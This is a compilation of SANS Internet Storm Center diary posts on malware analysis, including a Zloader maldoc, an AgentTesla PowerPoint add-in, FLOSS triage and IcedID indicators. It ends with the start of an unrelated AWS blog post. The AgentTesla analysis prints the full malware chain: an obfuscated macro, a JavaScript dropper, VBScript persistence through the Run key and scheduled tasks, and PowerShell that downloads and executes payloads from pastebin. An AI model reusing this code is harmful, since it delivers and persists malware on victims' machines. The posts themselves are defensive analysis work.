Zloader Maldoc Analysis With xlm-deobfuscator, (Sun, May 24th)

This post was originally published on this site

Reader Roland submitted a malicious Zloader Excel 4 macro spreadsheet (MD5 82c12e7fe6cabf5edc0bdaa760b4b8c8).

It’s typical of the samples we have seen these last weeks, with heavy formula obfuscation:

These maldocs can now easily be analysed with xlm-deobfuscator:

I also created a short video:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 3.2.4 Released, (Sun, May 24th)

This post was originally published on this site

Wireshark version 3.2.4 was released.

It has a vulnerability fix and bug fixes.

A vulnerability in the NSP dissector can be abused to cause a crash.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AgentTesla Delivered via a Malicious PowerPoint Add-In, (Sat, May 23rd)

This post was originally published on this site

Attackers are always trying to find new ways to deliver malicious code to their victims. Microsoft Word and Excel are documents that can be easily weaponized by adding malicious VBA macros. Today, they are one of the most common techniques to compromise a computer. Especially because Microsoft implemented automatically executed macros when the document is opened. In Word, the macro must be named AutoOpen(). In Excel, the name must be Workbook_Open(). However, PowerPoint does not support this kind of macro. Really? Not in the same way as Word and Excel do!

While hunting, I found an interesting document disguised as a PowerPoint template (with the extension ‘.pot’) delivered within a classic phishing email. In reality, it was not a template but an add-in. PowerPoint supports ‘add-ins’ developed by third parties to add new features[1]. And guess what? Add-ins are able to automatically execute macros. Here is the list of available actions:

  • Sub Auto_Open() – Gets executed immediately after the presentation is opened.
  • Sub Auto_Close() – Gets executed prior to the presentation is closed.
  • Sub Auto_Print() – Gets executed prior to the presentation being printed.
  • Sub Auto_ShowBegin() – Gets executed when the show begins.
  • Sub Auto_ShowEnd() – Gets executed when the show ends.
  • Sub Auto_NextSlide(Index as Long) – Gets executed before the slideshow moves onto the next slide. The index represents the SlideIndex of the Slide about to be displayed.

Two macros are fired automatically within an add-in. Auto_Open() and Auto_Close(). Auto_Open() is fired when the add-in is loaded and Auto_Close() fired when the add-in is being unloaded. You can use them to do preprocessing, creating menu items, setting up event handlers, etc, or performing cleanup upon exiting.

The document (SHA256:b345b73a72f866ac3bc2945467d2678ca4976dd4c51bd0f2cdb142a79f56210a[2]) that I found contains an Auto_Close() macro defined that will open an URL when the victim closes PowerPoint. Let’s have a look at the document. Macros are stored in the same way as Word or Excel, they are stored in an OLE2 file:

root@remnux:/malwarezoo# file Payments detail.pot
Payments detail.pot: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: payments, Keywords: dsgsdfs, Template: Family tree chart (horizontal, green, white, widescreen), Revision Number: 1, Name of Creating Application: Microsoft Office PowerPoint, Create Time/Date: Fri May  8 02:02:01 2020, Last Saved Time/Date: Fri May  8 02:03:34 2020, Number of Words: 2891
root@remnux:/malwarezoo# oledump.py Payments detail.pot
  1:      2784 'x05DocumentSummaryInformation'
  2:       380 'x05SummaryInformation'
  3:       445 'PROJECT'
  4:        26 'PROJECTwm'
  5: M    1921 'VBA/Module1'
  6:      2454 'VBA/_VBA_PROJECT'
  7:      1377 'VBA/__SRP_0'
  8:        88 'VBA/__SRP_1'
  9:       392 'VBA/__SRP_2'
 10:       103 'VBA/__SRP_3'
 11:       493 'VBA/dir'
root@remnux:/malwarezoo# oledump.py Payments detail.pot -s 5 -v
Attribute VB_Name = "Module1"
   Sub auto_close()
        Dim yoCgYQoJx As Object
        Dim r5ozCUcyJ As String
        Dim a4CItAIOl As String
        Dim PhS6Kx17B As String
        PhS6Kx17B = ("W" + "S" + "c" + "ript.Shell")
        Set yoCgYQoJx = CreateObject(PhS6Kx17B)
        r5ozCUcyJ = StrReverse("""a'*'zaebba'*'a'*'dp'*'.j:ptth""""aths'*'""")
        a4CItAIOl = Replace(r5ozCUcyJ, "'*'", "m")
        yoCgYQoJx.Run a4CItAIOl
End Sub

When the victim opens the ‘Payments detail.pot’ file, PowerPoint is launched and the add-in silently installed. Seeing that no content is displayed (there is no slide to render), the user will close PowerPoint and the macro will be executed.

You can see the installed Add-ins in the PowerPoint options:

The macro simply launches an URL. In this case, Windows will try to open with the default browser. The malicious URL is:


This HTTP request returns a 301 to a pastie:


Here is the pastie content (some Javascript code):

<script type="text/javascript">
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%72%65%37%31%66%63%33%31%28%27') + '%39%70%62%71%63%71%76%24%6d%66%72%6c%7f%64%6c%60%3a%2c%2b%25%3c%3b%38%2a%20%30%3f%38%2f%20%32%36%3d%2e%26%3e%39%38%20%22%36%34%33%35%2b%25%35%31%32%3f%2d%2d%34%36%33%38%20%26%33%35%3b%38%26%45%07%0b%0a%0b%40%7c%64%63%70%64%54%66%69%6f%62%73%2d%21%51%56%65%72%68%77%74%35%5d%6d%62%69%6b%2c%28%30%52%74%75%20%21%2c%23%6a%72%6f%7e%60%24%22%27%21%68%73%7e%75%39%59%5b%7a%60%75%70%64%61%69%75%38%62%74%68%5b%7c%60%79%58%36%71%4d%3e%67%31%31%7f%21%2c%27%0f%0a%0c%09%47%71%6f%64%73%60%54%6c%6f%67%63%75%2f%26%5c%5d%62%71%6c%77%7e%33%55%6c%64%6b%6c%21%23%37%51%70%75%2a%56%76%72%57%62%7a%62%7c%72%62%2d%21%39%21%32%3c%21%74%6d%34%2a%40%53%50%55%43%4c%22%63%76%34%20%62%7e%64%62%73%60%39%21%75%6b%76%66%74%6f%6d%72%21%2c%27%25%21%24%70%73%27%26%21%52%7f%6e%61%62%79%76%24%22%21%34%74%71%2a%23%21%59%21%2c%6c%75%6c%75%66%5c%21%2c%25%6f%71%73%7a%3f%5e%58%71%66%77%73%6f%63%6e%77%35%6d%72%6f%58%77%66%7b%5b%3d%73%4a%3c%6a%3e%37%78%22%27%27%33%4d%2a%23%2b%35%0a%04%0c%0c%43%77%62%61%73%6f%56%61%6b%62%6d%75%2a%22%5a%50%67%71%63%75%73%37%50%62%64%6e%68%27%2e%32%51%6f%6e%5c%73%6e%7e%64%22%53%75%71%56%62%70%60%71%72%62%22%27%56%52%40%53%57%5b%78%70%51%59%75%79%68%75%72%64%5d%74%75%6f%73%71%70%40%56%76%79%77%65%75%69%5c%56%71%6d%76%70%79%77%65%6d%4c%5b%65%71%6b%7e%73%6f%74%5d%5d%57%43%4e%4f%26%2e%26%25%21%23%21%67%27%22%2b%21%21%77%21%2a%2a%27%23%6f%2c%21%2d%24%27%73%26%27%25%25%21%64%21%2c%27%24%6c%75%73%70%39%56%59%77%64%70%7e%64%64%6d%73%35%67%74%67%59%71%64%7c%56%6c%4e%5e%77%41%35%3c%73%23%21%23%2b%2a%27%54%41%4a%64%57%59%2c%08%09%08%09%4d%77%67%65%75%62%53%61%64%60%60%71%2f%2c%5a%55%63%77%6e%70%73%38%52%6f%60%6b%66%27%2b%36%57%62%6b%5c%7c%6c%73%60%27%5d%75%74%52%64%7d%65%71%7d%60%2f%23%5b%78%74%54%58%73%74%69%70%7c%60%5d%71%75%6f%77%74%71%46%5b%77%7c%79%61%75%6c%5c%56%75%68%77%76%74%76%60%63%48%5b%60%71%6b%7a%76%6e%72%50%5c%52%4d%4a%4f%23%2e%26%21%24%22%27%6a%26%27%25%25%21%72%21%2a%2e%22%22%69%21%20%28%2a%23%73%23%27%25%21%24%65%27%21%26%21%62%71%73%75%39%56%5d%72%65%76%73%65%61%63%77%35%62%74%67%5d%74%65%7a%5b%45%41%61%4e%52%32%6e%6b%27%24%22%2d%27%26%51%4f%4e%64%52%59%2c%0c%0c%09%0f%70%65%6b%60%37%60%69%74%7d%64%0f%0a%3d%34%77%60%7c%6c%77%71%458863930%37%35%37%35%38%33%30' + unescape('%27%29%29%3b'));
// -->

The decode version shows more payloads being downloaded:

function re71fc31(s) {
  var r = "";
  var tmp = s.split("8863930");
  s = unescape(tmp[0]);
  k = unescape(tmp[1] + "635258");
  for( var i = 0; i < s.length; i++) {
    r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-2); 
  return r;
} document.write(re71fc31('%39%70%62%71%63%71%76%24%6d%66%72%6c%7f%64%6c%60%3a%2c%2b%25%3c%3b%38%2a%20%30%3f%38%2f%20%32%36%3d%2e%26%3e%39%38%20%22%36%34%33%35%2b%25%35%31%32%3f%2d%2d%34%36%33%38%20%26%33%35%3b%38%26%45%07%0b%0a%0b%40%7c%64%63%70%64%54%66%69%6f%62%73%2d%21%51%56%65%72%68%77%74%35%5d%6d%62%69%6b%2c%28%30%52%74%75%20%21%2c%23%6a%72%6f%7e%60%24%22%27%21%68%73%7e%75%39%59%5b%7a%60%75%70%64%61%69%75%38%62%74%68%5b%7c%60%79%58%36%71%4d%3e%67%31%31%7f%21%2c%27%0f%0a%0c%09%47%71%6f%64%73%60%54%6c%6f%67%63%75%2f%26%5c%5d%62%71%6c%77%7e%33%55%6c%64%6b%6c%21%23%37%51%70%75%2a%56%76%72%57%62%7a%62%7c%72%62%2d%21%39%21%32%3c%21%74%6d%34%2a%40%53%50%55%43%4c%22%63%76%34%20%62%7e%64%62%73%60%39%21%75%6b%76%66%74%6f%6d%72%21%2c%27%25%21%24%70%73%27%26%21%52%7f%6e%61%62%79%76%24%22%21%34%74%71%2a%23%21%59%21%2c%6c%75%6c%75%66%5c%21%2c%25%6f%71%73%7a%3f%5e%58%71%66%77%73%6f%63%6e%77%35%6d%72%6f%58%77%66%7b%5b%3d%73%4a%3c%6a%3e%37%78%22%27%27%33%4d%2a%23%2b%35%0a%04%0c%0c%43%77%62%61%73%6f%56%61%6b%62%6d%75%2a%22%5a%50%67%71%63%75%73%37%50%62%64%6e%68%27%2e%32%51%6f%6e%5c%73%6e%7e%64%22%53%75%71%56%62%70%60%71%72%62%22%27%56%52%40%53%57%5b%78%70%51%59%75%79%68%75%72%64%5d%74%75%6f%73%71%70%40%56%76%79%77%65%75%69%5c%56%71%6d%76%70%79%77%65%6d%4c%5b%65%71%6b%7e%73%6f%74%5d%5d%57%43%4e%4f%26%2e%26%25%21%23%21%67%27%22%2b%21%21%77%21%2a%2a%27%23%6f%2c%21%2d%24%27%73%26%27%25%25%21%64%21%2c%27%24%6c%75%73%70%39%56%59%77%64%70%7e%64%64%6d%73%35%67%74%67%59%71%64%7c%56%6c%4e%5e%77%41%35%3c%73%23%21%23%2b%2a%27%54%41%4a%64%57%59%2c%08%09%08%09%4d%77%67%65%75%62%53%61%64%60%60%71%2f%2c%5a%55%63%77%6e%70%73%38%52%6f%60%6b%66%27%2b%36%57%62%6b%5c%7c%6c%73%60%27%5d%75%74%52%64%7d%65%71%7d%60%2f%23%5b%78%74%54%58%73%74%69%70%7c%60%5d%71%75%6f%77%74%71%46%5b%77%7c%79%61%75%6c%5c%56%75%68%77%76%74%76%60%63%48%5b%60%71%6b%7a%76%6e%72%50%5c%52%4d%4a%4f%23%2e%26%21%24%22%27%6a%26%27%25%25%21%72%21%2a%2e%22%22%69%21%20%28%2a%23%73%23%27%25%21%24%65%27%21%26%21%62%71%73%75%39%56%5d%72%65%76%73%65%61%63%77%35%62%74%67%5d%74%65%7a%5b%45%41%61%4e%52%32%6e%6b%27%24%22%2d%27%26%51%4f%4e%64%52%59%2c%0c%0c%09%0f%70%65%6b%60%37%60%69%74%7d%64%0f%0a%3d%34%77%60%7c%6c%77%71%458863930%37%35%37%35%38%33%30'));

And, the decoded payload:

<script language="VBScript">
CreateObject("WScript.Shell").Run """mshta""""http:pastebin.comraw3rM9m42v"""
CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs") + "tn ""Xvideos"" /tr """"mshta"" hxxp:pastebin[.]comraw3rM9m42v"" /F ",0
CreateObject("WScript.Shell").RegWrite StrReverse("TRATSnuRnoisreVtnerruCswodniWtfosorciMerawtfoSUCKH"), """m" + "s" + "h" + "t" + "a""""http:pastebin.comrawmLVrB57y""", "REG_SZ"
CreateObject("WScript.Shell").RegWrite StrReverse("nuRnoisreVtnerruCswodniWtfosorciMerawtfoSUCKH"), """m" + "s" + "h" + "t" + "a""""hxxp:pastebin[.]comrawEBgGU3ia""", "REG_SZ"

The script fetches two extra payloads from pastebin.com, one of them was already removed but I successfully grabbed a copy. Both are identical, here is the decoded payload:

<script language="VBScript">
CreateObject("WScript.Shell").RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionRunbin", "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell ((gp HKCU:Software).iamresearcher)|IEX"""", 0 : window.close"")", "REG_SZ"

CreateObject("Wscript.Shell").regwrite "HKCUSoftwareiamresearcher", "$fucksecurityresearchers='contactmeEX'.replace('contactme','I');sal M $fucksecurityresearchers;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$iwannajoinuiwannaleavedsshit = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $iwannajoinuiwannaleavedsshit;$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;$iwannaleftsellingtools.open('GET','hxxps://pastebin[.]com/raw/EyRQAwZ9',$false);$iwannaleftsellingtools.send();$iwannaleftsellingtoolsy=$iwannaleftsellingtools.responseText;$asciiChars= $iwannaleftsellingtoolsy -split '-' |ForEach-Object {[char][byte]""0x$_""};$asciiString= $asciiChars -join ''|M;[Byte[]]$Cli2= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''hxxps://pastebin[.]com/raw/MbysCQ9a'').replace(''$'',''!#!@#'').replace(''!#!@#'',''0x'')')) | g;$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);[rOnAlDo]::ChRiS('InstallUtil.exe',$Cli2)" , "REG_SZ"
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!" & strComputer & "rootcimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:rootcimv2:Win32_Process")
errReturn = objProcess.Create( "powershell ((gp HKCU:Software).iamresearcher)|IEX", null, objConfig, intProcessID)
'i am not a coder not a expert i am script kiddie expert i read code from samples on site then compile in my way
'i am not a coder ;) i watch you on twitter every day thanks :) i love my code reports!
'i am not a coder! bang ;)

(Note the funny comments at the end of the script)

Two new pasties are fetched. Here is the decoded content (PowerShell code):

function UNpaC0k3333300001147555 {
    Param ([byte[]] $byteArray)
  Process {
    Write-Verbose "Get-DecompressedByteArray"
    $input = New-Object System.IO.MemoryStream( , $byteArray )
    $output = New-Object System.IO.MemoryStream
    $01774000 = New-Object System.IO.Compression.GzipStream $input,       
    $puffpass = New-Object byte[](1024)
    while($true) {
      $read = $01774000.Read($puffpass, 0, 1024)
      if ($read -le 0){break}
      $output.Write($puffpass, 0, $read)
    [byte[]] $bout333 = $output.ToArray()
    Write-Output $bout333

$t0='DEX'.replace('D','I');sal g $t0;[Byte[]]$MNB=('@!1F,@!8B,@!08,@!00,@!00,@!00,@!00,@!00,@!04,@!00,@!ED,@!7C,@!79,@!5C,@!53,@!47,@!D7,@!F0,@!DC,@!EC,@!09,@!8B,@!DC,@!84,@!25,@!40,@!20,@!83,@!8A,@!A2,@!2C,@!82,@!A0,@!E2,@!2E,@!02,@!8A,@!22,@!8A,@!E2,@!12,@!22,@!0A,@!01,@!02,@!46,@!96,@!60,@!08,@!2A,@!2E,@!34,@!D5,@!6A,@!AD,@!5A,@!57,@!14,@!F7,@!B5,@!B6,@!EE,@!2B,@!56,@!7D,@!1E,@!77,@!AD,@!56,@!EB,@!5A,@!2D,@!75,@!69,@!B5,@!56,@!5B,@!B7,@!B6,@!B6,@!5A,@!5B,@!C5,@!85,@!F7,@!CC,@!DC,@!1B,@!08,@!8A,@!7D,@!9F,@!EF,@!AF,@!F7,@!FB,@!BD,@!BF,@!F7,@!CA,@!3D,@!77,@!CE,@!99,@!33,@!

[stuff removed]

7F,@!33,@!D0,@!4A,@!F9,@!3E,@!89,@!0D,@!DF,@!D6,@!F3,@!4D,@!3E,@!3D,@!8C,@!3C,@!08,@!46,@!20,@!B6,@!2B,@!82,@!28,@!30,@!41,@!FD,@!18,@!98,@!65,@!39,@!54,@!96,@!AC,@!DA,@!08,@!22,@!BC,@!44,@!0E,@!CE,@!9B,@!04,@!23,@!BC,@!16,@!9A,@!6F,@!13,@!2F,@!C4,@!50,@!3A,@!19,@!27,@!1E,@!24,@!B5,@!CB,@!59,@!0C,@!B5,@!24,@!22,@!1C,@!35,@!E2,@!62,@!8F,@!C4,@!4F,@!3F,@!DE,@!CF,@!26,@!3E,@!7E,@!EC,@!B1,@!58,@!F8,@!8F,@!71,@!C4,@!CD,@!0F,@!4E,@!AB,@!6C,@!A8,@!27,@!32,@!FE,@!D3,@!FC,@!E8,@!46,@!E3,@!BC,@!3E,@!FF,@!9B,@!D1,@!FE,@!4F,@!B1,@!DE,@!81,@!7E,@!A1,@!8C,@!A1,@!D6,@!23,@!B6,@!23,@!3B,@!88,@!D2,@!B7,@!F6,@!24,@!E8,@!AD,@!3D,@!C9,@!FF,@!EA,@!2B,@!83,@!FB,@!26,@!5F,@!14,@!F5,@!3F,@!2D,@!C8,@!FF,@!5D,@!FF,@!13,@!D7,@!7F,@!01,@!60,@!B9,@!70,@!AA,@!00,@!50,@!00,@!00'.replace('@!','0x'))| g;


[stuff removed]

F2,@!D3,@!57,@!FF,@!E7,@!66,@!03,@!86,@!AC,@!3C,@!96,@!D0,@!16,@!EC,@!FD,@!F1,@!99,@!5B,@!54,@!79,@!24,@!D3,@!AC,@!14,@!4A,@!8E,@!17,@!AF,@!76,@!29,@!A3,@!E4,@!88,@!FC,@!B2,@!A8,@!37,@!90,@!84,@!33,@!5B,@!46,@!7B,@!5D,@!7C,@!E0,@!51,@!64,@!7D,@!4F,@!24,@!F3,@!3B,@!12,@!6C,@!C9,@!55,@!88,@!A8,@!25,@!91,@!14,@!DF,@!31,@!69,@!13,@!F3,@!BB,@!26,@!DA,@!12,@!90,@!AC,@!FF,@!8D,@!E8,@!FD,@!7E,@!A4,@!7F,@!DB,@!7E,@!B5,@!DF,@!62,@!87,@!45,@!91,@!FF,@!26,@!46,@!D4,@!41,@!DB,@!04,@!72,@!63,@!87,@!4F,@!FC,@!CA,@!3C,@!4F,@!CB,@!3C,@!EF,@!E4,@!D9,@!3F,@!DB,@!FD,@!73,@!9D,@!93,@!31,@!05,@!20,@!5A,@!62,@!BB,@!15,@!F0,@!7E,@!02,@!4B,@!FF,@!68,@!DC,@!FF,@!F2,@!0F,@!97,@!77,@!61,@!EE,@!C1,@!07,@!73,@!7F,@!5A,@!90,@!FF,@!E5,@!4F,@!94,@!AF,@!46,@!90,@!E6,@!95,@!00,@!C2,@!00,@!00'.replace('@!','0x'))| g

[byte[]]$deblindB = UNpaC0k3333300001147555 $blindB
[byte[]]$decompressedByteArray = UNpaC0k3333300001147555  $MNB

The two hex-encoded chunks of data decoded into a DLL and a PE. The PE is an AgentTesla malware (SHA256: d46615754e00e004d683ff2ad5de9bca976db9d110b43e0ab0f5ae35c652fab7[3])

Conclusion: PowerPoint can also be used to deliver malicious content!

[1] https://docs.microsoft.com/en-us/office/dev/add-ins/tutorials/powerpoint-tutorial
[2] https://www.virustotal.com/gui/file/b345b73a72f866ac3bc2945467d2678ca4976dd4c51bd0f2cdb142a79f56210a/detection
[3] https://www.virustotal.com/gui/file/d46615754e00e004d683ff2ad5de9bca976db9d110b43e0ab0f5ae35c652fab7/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Some Strings to Remember, (Fri, May 22nd)

This post was originally published on this site

When you handle unknown files, be it for malware analysis or other reasons, it helps to know some strings / hexadecimal sequences to quickly recognize file types and file content.

If you want to memorize some strings to improve your analysis skills, I recommend that the first string you memory is MZ, or 4D 5A in hexadecimal (ASCII table).

All Windows executables (PE file format) start with these 2 bytes: 4D 5A.

And that is not the only “skill” that you acquire by memorizing 4D 5A: as Z is the last letter of the alphabet, you also learned that all uppercase letters are smaller than or equal to 5A. You might already know that letter A is 41 (for example from PoC buffer overflows: AAAAAA -> 414141414141). Then you’ve learned that all uppercase letters are between hexadecimal values 41 and 5A.

Lowercase letters have their 6th most-significant bit set, while uppercase letters have that bit cleared. A byte with its 6th MSB set and all other bits cleared, has hexadecimal value 20. Add 20 to 41, and you have 61: letter a. Hence all lowercase letters are comprised between hexadecimal values 61 and 7A.

The next string I recommend to memorize, is PK: 50 4B. All records of a ZIP file start with PK (50 4B), and typical ZIP files start with a ZIP record (although this is not mandatory): hence typical ZIP files starts with PK. ZIP files are not only used for ZIP archives, but also for many other file formats, like Office documents (.docx, .docm, .xlsx, .xlsm, …).


And when you memorize that PK is 50 4B, then it’s not that difficult to memorize that PE is 50 45 (E is the fifth letter -> 45).

PE are the first 2 bytes of the header for PE files (Windows executables), and can be found after the MZ header (which is actually the DOS header).

If some mnemotechnic can help you remember strings MZ and PK: then know that these are initials of developers: Mark Zbikowski and Phil Katz.

To summarize:

  • MZ -> 4D 5A
  • PK -> 50 4B
  • PE -> 50 45
  • A-Z -> 41 – 5A
  • a-z -> 61 – 7A

Please post a comment if you have more “memorable” strings. We might end up with a small cheat sheet.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malware Triage with FLOSS: API Calls Based Behavior, (Thu, May 21st)

This post was originally published on this site

Malware triage is a key component of your hunting process. When you collect suspicious files from multiple sources, you need a tool to automatically process them to extract useful information. To achieve this task, I’m using FAME[1] which means “FAME Automates Malware Evaluation”. This framework is very nice due to the architecture based on plugins that you can enable upon your needs. Here is an overview of my configuration:

FAME has a REST API that helps to automate the submission of samples. I’ve multiple sources like catch-all email addresses from where I extract malicious attachments. Based on their MIME type, submitted files are processed with the right plugins. Example: PDF are passed to the Peepdf module:

Office documents are passed to the Olevba module:

Executables and scripts are passed to the CAPE module (sandbox analysis):

There are many modules available. Analyzing files in a sandbox, like CAPE, is very nice but it consumes a lot of resources. When you submit a bunch of PE files, it could take some time to get results.

A good point about the FAME framework: It’s easy to write your own module (in Python) to process files. To speed up the triage of malicious PE files, I created a module that uses FLOSS to extract files from executables. FLOSS[2], as the acronym says – “FireEye Labs Obfuscated String Solver”, is developed by FireEye. It is a powerful tool that offers a way to automatically deobfuscate concealed strings using common and proprietary algorithms. When you use a command like ‘strings’ against binary files, you will collect only clear-text strings:

root@remnux:/malwarezoo# strings sample.exe |head -10
!This program cannot be run in DOS mode.

FLOSS emulates the execution of Windows executables to allow it to deobfuscate strings. FLOSS examines the file statically and locates functions that might be capable of decoding strings and emulating their execution to determine what content they are likely to produce. FLOSS can also decode stack strings:

FLOSS is available as a stand-alone binary but, being developed in Python, there is a library available that allows you to integrate FLOSS in your own tools.  I wrote a FLOSS plugin that extracts strings from binaries:

  • Static strings
  • Decoded strings
  • Stack strings

Often, just by having a look at the imports on a PE file, you can already get an idea about its behavior. Some of them are more suspicious than others. To facilitate the detection of suspicious behavior, there is a way to search for suspicious strings (a single one) or a group of strings. Indeed, some malicious features are implemented by calling a suite of API calls. A good example is a technique called “process hollowing”[3]. This technique is based on:

  • CreateRemoteThreat()
  • NtUnmapViewOfSection()
  • VirtualAllocEx()
  • WriteProcessMemory()
  • ResumeThreat()

You can define your own set of suspicious strings. A simple correlation is performed by concatenating them with ‘_AND_’. Here is an example of a configuration file:

root@fame:/# cat /opt/fame/conf/floss_suspicious.txt

Another example of correlation is: LoadLibrary() & GetProcAddress(). This combination of API calls, called “dynamic linking”, is often used by packed malware.

FLOSS is much faster than a complete analysis in a real sandbox and speeds us the results in FAME. Here are the results of an analyzed file in FAME:

The script is configurable in FAME like any plugin and allows the following configuration parameters to be defined:

  • The minimum / maximum lengths of strings to report
  • The maximum amount of strings to report
  • A list of strings to ignore (blacklist)
  • A list of suspicious strings (like interesting API calls)

If you’re interested in this module for FAME or just to see how the FLOSS library is implemented, I published the module on my GitHub account[4]. It’s the first version and the script will evolve for sure. If you’ve any ideas or suggestions, let me know!

[1] https://certsocietegenerale.github.io/fame/
[2] https://github.com/fireeye/flare-floss
[3] https://attack.mitre.org/techniques/T1093/
[4] https://github.com/xme/fame_modules/tree/master/processing/floss_str

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Microsoft Word document with malicious macro pushes IcedID (Bokbot), (Wed, May 20th)

This post was originally published on this site


Every so often, I run across a sample of IcedID, also known as Bokbot.  The infection characteristics have changed a little since my previous diary about IcedID.  An in-depth write-up has already been published by IBM Security Intelligence about recent changes in IcedID this year, so today’s diary is a quick review from a recent infection in my lab on Tuesday 2020-05-19.

The chain of events for this infection:

  • Microsoft Office document, either a Word document or Excel spreadsheet, likely sent through malspam
  • Open document and enable macros
  • Word doc drops and runs initial EXE
  • HTTPS traffic to non-malicious URLs
  • HTTPS traffic to .xyz domain
  • PNG file with encoded data used to create follow-up IcedID EXE
  • Follow-up IcedID EXE made persistent through scheduled task
  • HTTPS post-infection traffic caused by IcedID (.club and .top TLDs)

The Word document

Shown above:  Screenshot of a Word document with malicious macros for IcedID.

Artifacts from an infected Windows host

The following are screenshots from reviewing artifacts from an infected Windows host in my lab.

Shown above:  The initial EXE dropped after enabling macros on the Word document.

Shown above:  Additional artifacts after the initial EXE was dropped. This includes the follow-up EXE for IcedID.

Shown above:  The follow-up EXE for IcedID persistent on an infected Windows host.

Shown above: Scheduled task to keep the IcedID infection persistent.

Shown above: Another artifact created after the IcedID infection became persistent.

Infection traffic

Shown above:  Traffic from the infection filtered in Wireshark.

Indicators of Compromise (IoCs)

Non-malicious traffic caused by the initial IcedID binary during this infection:

  • port 443 – support.apple.com – HTTPS traffic
  • port 443 – www.intel.com – HTTPS traffic
  • port 443 – help.twitter.com – HTTPS traffic
  • port 443 – support.microsoft.com – HTTPS traffic
  • port 443 – support.oracle.com – HTTPS traffic
  • port 443 – www.oracle.com – HTTPS traffic

Malicious traffic during this IcedID infection:

  • 86.106.20[.]175 port 443 – connuwedro[.]xyz – HTTPS traffic
  • 31.24.224[.]12 port 443 – cucumberz99[.]club – HTTPS traffic
  • 31.24.224[.]12 port 443 – pimidorro22[.]top – HTTPS traffic
  • 31.24.224[.]12 port 443 – gotothe5[.]club – HTTPS traffic

Files recovered from an infected Windows host:

SHA256 hash:  822a8e3dfa14cd7aaac749dc0515c35cf20632717e191568ba5daf137db7ec17

  • File size:  127,278 bytes
  • File name:  FMLAINSTRUCTIONS.doc
  • File description:  Word doc (DOCX file) with macro for IcedID (Bokbot)

SHA256 hash:  ee9fd78107cdcaffc274cf2484d6c74c56c7f3be39b1896894d9525506118d1e

  • File size:  108,032 bytes
  • File location:  C:1WholePFSDNSKDF.EXE
  • File description:  Initial EXE for IcedID infection dropped after enabling Word macros

SHA256 hash:  d40566808aead4fecec53813d38df4fbe26958281a529baf5b6689f0163d613f

  • File size:  109,895 bytes
  • File location:  C:Users[username]AppDataLocalTemp~530644480.tmp
  • File type:  PNG image data, 525 x 539, 8-bit/color RGB, non-interlaced
  • File description:  PNG image containing encoded data for follow-up IcedID executable

SHA256 hash:  c35dd2a034376c5f0f22f0e708dc773af8ee5baf83e2a4749f6f9d374338cd8e

  • File size:  105,472 bytes
  • File location:  C:Users[username]AppDataLocalTemp~5157171.exe
  • File location:  C:Users[username]AppDataRoaming{A64BACC9-7079-26A0-9625-645E78074A96}[username]Ixoyhoka2.exe
  • File description:  IcedID executable extracted from the above PNG and made persistent on the infected Windows host

SHA256 hash:  45520a22cdf580f091ae46c45be318c3bb4d3e41d161ba8326a2e29f30c025d4

  • File size:  667,077 bytes
  • File location:  C:Users[username]AppDataLocalilbekaac2{1EA129C9-3B27-EA75-47E0-B55E92D185DD}tiagac3.png
  • File description:  Artifact dropped during IcedID infection, probably contains encoded data
  • File type:  PNG image data, 643 x 283, 8-bit/color RGB, non-interlaced

Final words

Word documents pushing IcedID reliably generate infections on vulnerable hosts in my lab environment.  However, Windows 10 computers that are fully patched, up-to-date, and following best security practices are not likely to get infected.

Email examples, malware samples, and a pcap from an infected Windows host used in today’s diary can be found here.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

MSP360 – Evolving Cloud Backup with AWS for Over a Decade

This post was originally published on this site

Back in 2009 I received an email from an AWS developer named Andy. He told me that he and his team of five engineers had built a product called CloudBerryExplorer for Amazon S3. I mentioned his product in my CloudFront Management Tool Roundup and in several subsequent blog posts. During re:Invent 2019, I learned that CloudBerry has grown to over 130 employees and is now known as MSP360. Andy and his core team are still in place, and continue to provide file management and cloud-based backup services.

MSP360 focuses on providing backup and remote management services to Managed Service Providers (MSPs). These providers, in turn, market to IT professionals and small businesses. MSP360, in effect, provides an “MSP in a box” that gives the MSPs the ability to provide a robust, AWS-powered cloud backup solution. Each MSP can add their own branding and market the resulting product to the target audience of their choice: construction, financial services, legal services, healthcare, and manufacturing to name a few.

